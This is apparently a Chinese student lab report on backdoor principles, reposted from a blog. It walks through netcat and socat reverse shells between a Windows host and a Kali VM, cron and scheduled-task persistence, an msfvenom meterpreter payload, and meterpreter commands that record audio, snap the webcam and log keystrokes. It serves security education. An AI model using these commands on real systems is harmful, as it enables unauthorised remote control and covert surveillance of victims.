码迷,mamicode.com
首页 > 其他好文 > 详细

20155227《网络对抗》Exp2 后门原理与实践

时间:2018-03-28 20:31:09      阅读:162      评论:0      收藏:0      [点我收藏+]

标签:自启   ever   子邮件   9.png   体会   shell   hot   安装   .com   

20155227《网络对抗》Exp2 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 在非官方网站下载软件时,后门很可能被捆绑在软件中。

  • 攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • Linux下可以通过cron来启动
  • Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;

(3)Meterpreter有哪些给你映像深刻的功能?

  • 获取摄像头以及对靶机直接截屏,感觉很方便很厉害的样子

(4)如何发现自己有系统有没有被安装后门?

  • 用杀毒软件进行扫描。
  • 检查端口和进程。

实验准备(常用后门工具实践)

Windows获得Linux Shell

  • Windows下查看ip
    技术分享图片

  • windows 打开监听
    技术分享图片

  • Linux反弹连接win
    技术分享图片

  • windows下获得一个linux shell,可运行任何指令
    技术分享图片

Linux获得Win Shell

  • Linux运行监听指令
    技术分享图片

  • Windows反弹连接Linux
    技术分享图片

  • Linux下看到Windows的命令提示
    技术分享图片

nc传输数据

如图:
技术分享图片

实验内容及过程

1.使用netcat获取主机操作Shell,cron启动

  • Windows系统下,监听5227端口。
    技术分享图片

  • crontab -e指令编辑一条定时任务,在最后一行添加50 * * * * /bin/netcat 192.168.56.1 5227 -e /bin/sh
  • 时间到了之后获得了kalishell,可以输入指令。
    技术分享图片

技术分享图片

2.使用socat获取主机操作Shell, 任务计划启动

  • Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
    技术分享图片

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5227 exec:cmd.exe,pty,stderr
    技术分享图片

  • 运行刚刚创建的任务:
    技术分享图片

  • 在kali中输入指令socat - tcp:192.168.56.1:5227,此时可以发现已经成功获得了一个cmd shell
    技术分享图片

3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
    技术分享图片

  • 将生成的后门程序复制到Windows主机上,也可以通过nc指令将生成的后门程序传送到Windows主机上
  • Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
    技术分享图片

  • 打开Windows上的后门程序
  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
    技术分享图片

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用help查看指令
    技术分享图片

  • 使用record_mic指令截获一段音频:
    技术分享图片

  • 使用webcam_snap指令使用摄像头进行拍照:
    技术分享图片

技术分享图片

  • 使用screenshot指令可以进行截屏:
    技术分享图片
    技术分享图片

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    技术分享图片

  • 使用getsystem指令进行提权,提权失败(win10):
    技术分享图片

  • 使用sysinfo查询电脑系统详细版本信息:
    技术分享图片

实验过程中遇到的问题及解决

  • 问题:在设置payload过程中出现Handler failed to bind to XXX的错误。
    技术分享图片

  • 解决:我在生成后门程序时不小心使用的是Windows的ip地址,改为kali的ip(相应的设置也改为kali的ip)之后问题解决。

实验体会

这次的实验非常有意思,使用MSF的时候,录音、截屏、照相、获取击键记录的实践让我在感到神奇的同时,也意识到我们的系统是很脆弱的。要保护好自己的隐私,就要提高安全意识。

20155227《网络对抗》Exp2 后门原理与实践

标签:自启   ever   子邮件   9.png   体会   shell   hot   安装   .com   

原文地址:https://www.cnblogs.com/guyanlin/p/8654069.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!